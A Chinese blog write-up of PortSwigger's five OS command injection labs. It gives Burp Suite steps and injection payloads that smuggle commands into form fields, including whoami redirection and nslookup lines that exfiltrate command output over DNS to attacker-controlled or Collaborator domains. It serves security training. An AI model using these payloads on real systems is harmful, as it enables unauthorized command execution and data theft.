burp靶场--操作系统命令注入

已于 2024-01-20 14:21:57 修改
阅读量521 收藏 9
点赞数 6
分类专栏: WEB安全 burp靶场 文章标签: 网络 安全 web安全
于 2024-01-20 14:20:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33168924/article/details/135678559
版权

burp靶场–操作系统命令注入

https://portswigger.net/web-security/os-command-injection#what-is-os-command-injection

1.操作系统命令注入:

操作系统命令注入也称为 shell 注入。它允许攻击者在运行应用程序的服务器上执行操作系统 (OS) 命令,通常会完全破坏应用程序及其数据。通常,攻击者可以利用操作系统命令注入漏洞来危害托管基础设施的其他部分,并利用信任关系将攻击转向组织内的其他系统。

实验1:操作系统命令注入,简单案例

### 使用要求:
该实验室的产品库存检查器中 存在操作系统命令注入漏洞。
应用程序执行包含用户提供的产品和商店 ID 的 shell 命令,并在响应中返回命令的原始输出。
要解决本实验,请执行whoami命令以确定当前用户的名称。

### 实验操作:
使用 Burp Suite 拦截并修改检查库存水平的请求。
修改storeID参数,为其指定值1|whoami。
请注意,响应包含当前用户的名称。

在这里插入图片描述

实验2:带时间延迟的操作系统盲命令注入

### 实验要求:
该实验室在反馈功能中 包含操作系统盲命令注入漏洞。
应用程序执行包含用户提供的详细信息的 shell 命令。命令的输出不会在响应中返回。
为了解决这个实验室问题,利用操作系统盲命令注入漏洞造成 10 秒的延迟。

### 实验操作:
使用Burp Suite拦截并修改提交反馈的请求。
修改email参数,改为:
email=x||ping+-c+10+127.0.0.1||
请注意,响应需要 10 秒才能返回。

在这里插入图片描述

实验3:具有输出重定向的盲操作系统命令注入

### 实验要求:
该实验室在反馈功能中 包含操作系统盲命令注入漏洞。
应用程序执行包含用户提供的详细信息的 shell 命令。命令的输出不会在响应中返回。但是,您可以使用输出重定向来捕获命令的输出。有一个可写文件夹:
/var/www/images/
应用程序从此位置提供产品目录的图像。您可以将注入命令的输出重定向到此文件夹中的文件,然后使用图像加载 URL 检索文件的内容。
要解决该实验,请执行whoami命令并检索输出。

### 实验操作:
使用Burp Suite拦截并修改提交反馈的请求。
修改email参数,改为:
email=||whoami>/var/www/images/output.txt||
现在使用 Burp Suite 拦截并修改加载产品图像的请求。
修改filename参数,将值更改为您为注入命令的输出指定的文件的名称:
filename=output.txt
观察响应包含注入命令的输出。

在这里插入图片描述
使用proxy开启拦截:一步一步找到查看图像的包:
在这里插入图片描述
查看命令输出结果:
在这里插入图片描述

实验4:带外交互的盲操作系统命令注入

### 实验要求:
该实验室在反馈功能中 包含操作系统盲命令注入漏洞。
应用程序执行包含用户提供的详细信息的 shell 命令。该命令是异步执行的,对应用程序的响应没有影响。无法将输出重定向到您可以访问的位置。但是,您可以触发与外部域的带外交互。
要解决该实验室问题,请利用操作系统盲命令注入漏洞向 Burp Collaborator 发出 DNS 查找。

### 实验操作:
使用Burp Suite拦截并修改提交反馈的请求。
修改email参数,改为:
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
右键单击并选择“插入 Collaborator 负载”以在修改的email参数中指示的位置插入 Burp Collaborator 子域。

###
5、利用带外(OAST)技术
1、简述:

可以使用一个注入命令,该命令将触发与您使用OAST技术控制的系统的带外网络交互。例如:

& nslookup kgji2ohoyw.web-attacker.com &
此有效负载使用nslookup命令对指定的域进行DNS查找。攻击者可以监视指定查找的发生,从而检测到命令已成功插入。 

2、带外通道还提供了一种从注入命令中提取输出的简单方法:

& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
这将导致对攻击者的域进行DNS查找,该域包含whoami命令:

wwwuser.kgji2ohoyw.web-attacker.com

###############
##
payload:email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
collaborator生成:zil6so7cbkpvszmjvnkp0v2v3m9dx3ls.oastify.com

email=x||nslookup+`whoami`.zil6so7cbkpvszmjvnkp0v2v3m9dx3ls.oastify.com||

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

实验5:带外数据泄露的盲操作系统命令注入

### 实验要求:
该实验室在反馈功能中 包含操作系统盲命令注入漏洞。
应用程序执行包含用户提供的详细信息的 shell 命令。该命令是异步执行的,对应用程序的响应没有影响。无法将输出重定向到您可以访问的位置。但是,您可以触发与外部域的带外交互。
要完成该实验,请执行whoami命令并通过 DNS 查询将输出渗透到 Burp Collaborator。您需要输入当前用户的名称才能完成实验。

### 实验操作:
使用Burp Suite Professional拦截并修改提交反馈的请求。
转到“协作者”选项卡。
单击“复制到剪贴板”将唯一的 Burp Collaborator 负载复制到剪贴板。
修改email参数,将其更改为如下所示,但在指示的位置插入您的 Burp Collaborator 子域:
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||
返回“协作者”选项卡,然后单击“立即投票”。您应该会看到一些由应用程序发起的作为负载结果的 DNS 交互。如果您没有看到列出的任何交互,请等待几秒钟然后重试,因为服务器端命令是异步执行的。
请注意,命令的输出出现在交互的子域中,您可以在“协作者”选项卡中查看该输出。所查找的完整域名显示在交互的“描述”选项卡中。
要完成实验,请输入当前用户的名称。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

参考:

### 【Burp系列】超全命令执行漏洞实验总结
https://mp.weixin.qq.com/s/CFy93BOGOfh_6Qb5yL6M6w
### payloadallthethings:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
### owasp命令执行:
https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection
0rch1d
关注
  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA 实验报告:2、命令注入
看那白熊
04-11 2675
本节主要讲解 DVWA_v1.9 中的命令注入部分。 覆盖全部四种安全级别,从源码分析的角度上进行攻击测试。 适合新手小白。
DVWA靶场系列(一)—— Command Injection(命令注入
qq_45612828的博客
07-10 3592
DVWA靶场系列(一)—— Command Injection(命令注入
WEB安全基础入门—操作系统命令注入(shell 注入)_文件参数 shell 命令注入
最新发布
2401_84186067的博客
04-30 714
攻击者可在服务器端执行任意系统(OS)命令,获取敏感数据。通常攻击者会尝试利用系统内部的信任关系,将攻击转移到系统内的其他系统,获取更大权限。
DVWA-Command Injection模块实验
weixin_52363821的博客
04-29 1178
命令注入的3个条件; Low等级、Medium等级以及High等级; Impossible等级的机制以及修复、防御命令注入的方法。 描述上面之外你所知道的其他技巧(3种以上)。
【OS命令注入02】OS命令注入漏洞靶场实验(基于DVWA靶场四个级别的 command injection)
Fighting_hawk的博客
02-27 3297
1. 了解windows和Linux系统管道符运行特点; 2. 了解OS命令注入的绕过思路。
DVWA靶场之Command Injection命令注入2021-08-16
loser的博客
08-16 119
DVWA靶场之Command Injection 命令注入LowMediumHigh 命令 说明 A || B A 执行失败后才会执行 B 命令 A | B A 执行的输出结果,作为 B 命令的参数,A 不论正确与否都会执行 B 命令 A&&B A 执行成功后才会执行 B 命令 A&B A后台运行,A和B同时执行 A;B A不论正确与否都会执行B命令 Low 对目标ip进行不同的ping测试,但是这里对用户输入的ip并没有进行任何的过滤,所以我们可
命令注入实战靶场分析(未通关靶场2)
Flynn的博客
03-24 424
通过对2个靶场的实战,总结命令注入的常用思路
mysql注入-sqlilabs靶场注入
10-15
通过实际操作,你将学会如何识别注入点,构造合适的payload,以及使用各种工具(如Burp Suite、Sqlmap等)自动化注入过程。 总的来说,这个PDF文档会详尽地解释SQL注入的各个方面,包括概念、技术、实战和防御措施...
sql注入靶场.zip
06-24
总的来说,"sql注入靶场.zip"提供了一个宝贵的实践环境,让学习者可以亲手操作,体验SQL注入的全过程,从而更好地理解和防范这种常见的网络安全威胁。无论是对网络安全专业人员,还是对Web开发者来说,都是一个...
PHP+MYSQL 注入靶场
04-26
通过这个靶场,你可以模拟真实环境下的安全测试,提升对SQL注入攻击的防御能力。下面将详细阐述SQL注入、PHP和MySQL在其中的作用以及如何进行渗透测试。 **SQL注入**是一种常见的网络安全威胁,发生在应用程序未能...
SQL注入练习.rar
06-25
多语句注入允许攻击者在单个输入字段中执行多个SQL命令。 每个关卡的解决方法可能包括使用特殊的字符来绕过过滤,利用UNION操作来拼接不同的查询结果,或者利用ORDER BY和LIMIT来遍历数据库列。此外,了解不同...
sqli-lib64关闯关笔记学习资料.zip
08-22
在WAMP环境下进行学习,意味着你将使用Windows操作系统,Apache Web服务器,MySQL数据库,以及PHP编程语言。这是一个常见的本地开发环境,适合搭建和测试Web应用,包括sqli-lib64这样的练习平台。 通过sqli-lib64的...
命令注入实操与总结
qq_51582652的博客
03-24 1996
这个内容是为了了解命令注入攻击的过程,掌握思路。记一次DVWA靶场的通关,commix-testbed靶场的实验。
合天实验室命令注入
我只会装360的博客
11-20 265
命令注入攻击(Command Injection),是指黑客通过利用HTML代码输入机制缺陷(例如缺乏有效验证限制的表格域)来改变网页的动态生成的内容。从而可以使用系统命令操作,实现使用远程数据来构造要执行的命令的操作。 PHP中可以使用下列四个函数来执行外部的应用程序或函数:system、exec、passthru、shell_exec,四个函数的原型如下: string system(s...
burpsuite安全练兵场-服务端4】操作系统命令注入-5个实验(全)
12-31 7360
【BP靶场portswigger-服务端4-操作系统命令注入】5个实验-千文详细步骤
SQL注入——从零开始搭建靶场详细教程_实战练习_注入原理
热门推荐
Ho1aAs‘s Blog
08-02 1万+
文章目录一、环境依赖二、靶场搭建Ⅰ、下载靶场文件Ⅱ、创建网站Ⅲ、更改数据库root密码Ⅳ、新建并导入数据库Ⅴ、验证访问靶场三、实战练习Ⅰ、嗅探字段①、验证合法性※语句解释②、查找注入点③、嗅探字段数Ⅱ、嗅探数据库信息Ⅲ、嗅探数据表信息①、查询所有表②、查询指定表的所有列Ⅳ、爆数据完 一、环境依赖 VMware V15.5(可选) Windows 10 x64 虚拟机(可选) phpstudy V8.1 MySQL V5.7.26(在phpstudy内选择) Nginx 1.15.11(在phpstudy内
1-Web安全——命令执行注入攻击
网络安全
09-06 7228
1. 系统命令执行 通常在程序开发过程中,应用程序需要调用一些外部程序时会用到一些系统命令相关函数。 例如在linux系统中,shell解释器就是用户和系统进行交互的一个接口,对用户的输入进行解析并在系统中执行。而shell脚本语言就是linux系统由各种shell命令组成的程序,具有其他普通编程的很多特点。 2. Web命令执行 常用的ASP,PHP,JSP等web脚本解释语言支持动态执行在运行时生成的代码这种特点,可以帮助开发者根据各种数据和条件动态修改程序代码,这对于开发人员来说是有利的.
Dvwa渗透测试之命令注入笔记
JBlock的博客
10-29 4897
今天我们我们讨论下命令注入,在之前我已经就命令注入的理论注入的理论知识做了介绍,所以只是在简单说一下,不再缀述。 命令执行执行漏洞是指攻击者可以随意执行系统命令,它属于高危漏洞之一,也属于代码执行的一部分。 漏洞产生原因:1.过多调用系统命令,或者说是在调用系统命令时不慎重。2.在调用系统命令时过滤不严格。3.在web开发中使用了一些不可控的函数或使用类不恰当,如eval()(动态执行php代码的函
ubantu下搭建docker并搭建sql注入靶场
世间繁华梦一出
12-08 1579
文章目录什么是Docker?Docker基本语法在docker上搭建sql-labs 什么是Docker? Docker 是一个开源的应用容器引擎,基于 Go 语言 并遵从 Apache2.0 协议开源。 Docker 可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。 容器是完全使用沙箱机制,相互之间不会有任何接口(类似 iPhone 的 app),更重要的是容器性能开销极低。 说白了就是一个开销更低,安装更便捷的虚拟机。 Doc
burp-loader-keygen
09-21
burp-loader-keygen是一个用于生成Burp Suite Pro许可证密钥的工具。您可以通过下载burp-loader-keygen.jar并运行它来生成密钥。具体步骤如下: 1. 确保您已经安装了Java环境。 2. 下载burp-loader-keygen.jar工具,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值